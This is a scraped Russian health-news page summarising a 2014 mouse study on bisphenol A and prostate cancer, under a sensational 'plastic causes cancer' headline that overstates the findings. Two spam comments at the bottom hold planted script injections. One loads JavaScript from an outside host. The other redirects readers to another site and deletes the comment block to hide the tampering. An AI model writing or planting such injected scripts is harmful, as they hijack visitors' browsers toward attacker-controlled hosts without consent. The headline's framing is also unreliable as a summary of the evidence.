Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Заберите у мужа бутылку! ...  >>  Заберите у мужа бутылку! Пластмасса вызывает рак!
 
Обратная связь
 

Заберите у мужа бутылку! Пластмасса вызывает рак!

Размер шрифта
17 июля 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Внутриутробное воздействие вещества, найденного в пластиковых бутылках, этикетках, квитанциях и других пластиковых предметах, повышает риск развития рака простаты в отдаленном будущем!

Заберите у мужа бутылку! Пластмасса вызывает рак!

Бисфенол А широко применяется при изготовлении мягкого пластика. «Избежать этого вещества невозможно, оно везде», – говорит Гейл Принс, профессор физиологии из Университета Иллинойса в Чикаго.

В предыдущих исследованиях было показано, что у людей, избегавших контактов с пластмассой и другими веществами, содержащими бисфенол А, в течение месяца и более, в любом случае обнаруживался бисфенол А в моче. Стоит отметить, что это вещество очень быстро выводится из организма – за 1-2 дня. Так что можно сделать вывод о том, что избегать контакта с бисфенолом А практически невозможно.

Воздействие бисфенола А на плод – отдельный вопрос. В эксперименте с грызунами он повышал риск эстроген-зависимых раков, в том числе рака простаты. Дело в том, что в организме бисфенол А ведет себя подобно эстрогену.

«Согласно нашему исследованию, непосредственный риск воздействия бисфенола А, который мы можем видеть в нашей повседневной жизни, - это повышение риска рака простаты у человека, – говорит профессор Принс. – Нежелательные эффекты бисфенола А достоверно доказаны, и мы надеемся, что это заставит производителя пересмотреть свою политику в использовании этого вещества».

В эксперименте участвовали мыши, которым имплантировали стволовые клетки простаты от умерших молодых людей. Стоит отметить, что стволовые клетки простаты крайне жизнеспособны. Они появляются еще во внутриутробном периоде и функционируют на протяжении все жизни, давая начало тканям простаты.

Ученые добавляли бисфенол А в корм животным в умеренных дозах, так что воздействие этого вещества на мышей равнялось таковому у среднего американца.

Через месяц эксперимента исследователи стали давать мышам эстроген, чтобы смоделировать естественный рост уровня этого гормона у стареющих мужчин. Считается, что подобные гормональные изменения – главная причина рака простаты.

У трети животных при гистологическом исследовании были найдены предраковые клетки простаты. В контрольной группе, в которой животных не кормили бисфенолом А, этот показатель составил 12%, то есть почти в три раза меньше. У мышей, которым имплантировали ранее подвергавшиеся воздействию бисфенола А клетки, эта цифра равнялась 45%.

«Мы считаем, что бисфенол А делает клетки более чувствительными к эстрогену, что делает их более подверженными ряду заболеваний, в том числе и раку простаты», – говорит профессор Принс.

Хотите больше узнать о «мужских» проблемах? Читайте наш спецпроект «Здоровье наших мужчин».

Данная статья основана на материалах, предоставленных Университетом Иллинойса в Чикаго. Результаты исследования опубликованы в журнале «Эндокринология» в 2014 году.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:32

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Муж не может долго заниматься сексом? Всего одна вещь решит вашу проблему!   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет   Обрезание после 35 лет предотвратит рак простаты! Осталось только найти желающих...  
23 июля 2013Из лысых крыс сделают лекарство от рака 09 июля 2013Майкл Дуглас заболел раком гортани из-за орального секса! Как дальше жить?
 
01 июля 2013Сладкая парочка против рака простаты! Соя + помидор! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Главные причины депрессии и как от них избавиться
Вся правда о раке простаты
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.